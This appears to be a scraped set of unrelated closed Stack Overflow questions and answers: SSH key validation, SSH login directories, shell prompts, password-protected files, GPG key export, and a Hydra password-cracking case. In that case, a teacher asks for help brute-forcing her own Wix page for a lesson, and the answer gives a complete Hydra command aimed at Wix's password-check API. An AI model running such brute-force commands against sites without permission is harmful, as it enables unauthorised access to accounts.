Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 9 years ago.
Improve this question
I have asked users for their public "id_rsa.pub" ssh key, that I then place in "/home/theiraccount/.ssh/authorized_keys", so they can login to the server by SSH. I'd like to automate this process.
Is there anyway to sanity check the string they give me (programmatically or otherwise)? I want to verify that sshd can read the text and that it actually looks like a valid public key (and hasn't been corrupted)?
Put another way, what is the format of the id_rsa.pub file? If someone enters it in a field what can I write in the form handler script to verify that it is complete and correct?
ssh-keygen can be used to calculate the fingerprint of a key file, which will fail if you don't pass it a key:
ssh-keygen -l -f id_rsa.pub
Another possibility would be ssh-vulnkey, that would have the advantage of checking the keys against the blacklist of known compromised keys at the same time.
Related
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 11 months ago.
Improve this question
I am trying to write a linux command to get into a Wix website I have created and put a password on. I have created the webpage to specifically show my students how easy it is for a hacker to crack a simple password, and hence the importance of strong passwords.
The website I have put the simple password on is https://missyjezabel.wixsite.com/my-site
I have written the following command to crack the password. Unfortunately, although it runs, it does not give the correct password.
hydra -l '' -P password.txt missyjezabel.wixsite.com http-post-form "/my-site:value=^PASS^:Please enter the correct password." -V
Any ideas of how to get it to work?
hydra -l '' -S -V -I -P password.txt site-pages.wix.com http-post-form"/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3:{\"password\"\:\"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\:\"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\:\"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}:S=\"success\"\:true:H=Origin\:https\://missyjezabel.wixsite.com:H=Accept\: */*:H=Content-Type\:application/json"
The site reaches out to an API endpoint that uses a different address to verify that the password matches with the given site-id:
site-pages.wix.com/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3
Target that site with correct JSON params:
{\"password\"\: \"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\: \"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\: \"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}
If the password is correct the response contains a "success":true json field.
S=\"success\"\:true
And some necessary headers to include in the requests:
H=Origin\: https\://missyjezabel.wixsite.com:H=Accept\:
*/*:H=Content-Type\: application/json
As of a dictionary attack, the password.txt must contain the valid password otherwise it will fail. For the given scenario I would recommend a short manually created list.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 8 years ago.
Improve this question
No, it is not a duplicate of that, because I want to assign one directory to one (or more) user, when they log in throught SSH.
For example, according to user's loggin :
userFoo => I want him to arrive /somewhere/here/ after SSH login
userBar => I want him to arrive /somewhere/here/ after SSH login
userOof => I want him to arrive /anywhere/ after SSH login
And so on.
How can I do that ?
(They are connection with PuTTY and I can't force them to connect with additionnal data like ssh -t user#server 'cd /home/some/dir ; exec "$SHELL"'
Change the home directories of your users, as that's the place where they land after connecting.
The second to last entry in /etc/passwd holds this information, and can be edited for example from
userFoo:x:1000:1000:,,,:/home/userFoo:/bin/bash
to
userFoo:x:1000:1000:,,,:/somewhere/here:/bin/bash
When you log in a remote machine via SSH, it starts a shell, in most cases it's bash. It has a script, which executes every time it starts, can be found at ~/.bashrc. You may edit them, append a cd /somewhere to them.
Anyway, it's probably not a good idea, it's better to link appropiate folders to the users:
ln -s /somewhere/here ~/userFoo/comehere
ln -s /somewhere/here ~/user/comehere
ln -s /anywhere ~/userOof/comehere
So, you may just tell the users "please perform a cd comehere after you log in", it will drop them to the specified folders.
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
When I SSH into my server, it has a really long name
user#this-is-a-really-really-really-really-long-server-name:~$
How can I change this to
user#short-name:~$
I'm not sure what to even google for.
Like Matt said. There is similar question on Unix.stackexchange
And you find some Background
here
Modify PS11
PS1="touch me : "
question is if you want to really change the hostname of the server, or only whats displayed at the beginning of the cli.
if you want to change the hostname, you better check specifically for your distribution.
if you only want to change what's displayed at the beginning of the cli, alter the ${PS1} variable via ~/.bashrc (user specific) or /etc/profile (global) or something like that.
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
Is there any way to protect the text file. I want to protect my text files to protect with password. So how is it possible that when client wants to open the text file it asks for password and files can be opened in notepad only after entering the right password. By using this can be make our files secure
Zip it and password protect the entry :) full compatibility with any PC and decent security :) (Zip ueses AES to pretect it's entries).
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 9 years ago.
Improve this question
I would like to know how data encryption and decryption works in PGP. As part of encryption, "gpg --gen-key" is used to generate the keys, And I got a public key, however I am not sure how to get private key. does it store in a specific location? is there any command to generate? I don't have any clue.
This is not specified in the document that I am following.
The private key is not "visible" like the public one, but you can get it following these instructions:
You can list private keys this way, in order to check if it exists:
gpg --list-secret-keys
And you can make it visible doing a backup of your keys:
gpg --armor --export-secret-keys your_email#domain.com > your_name.asc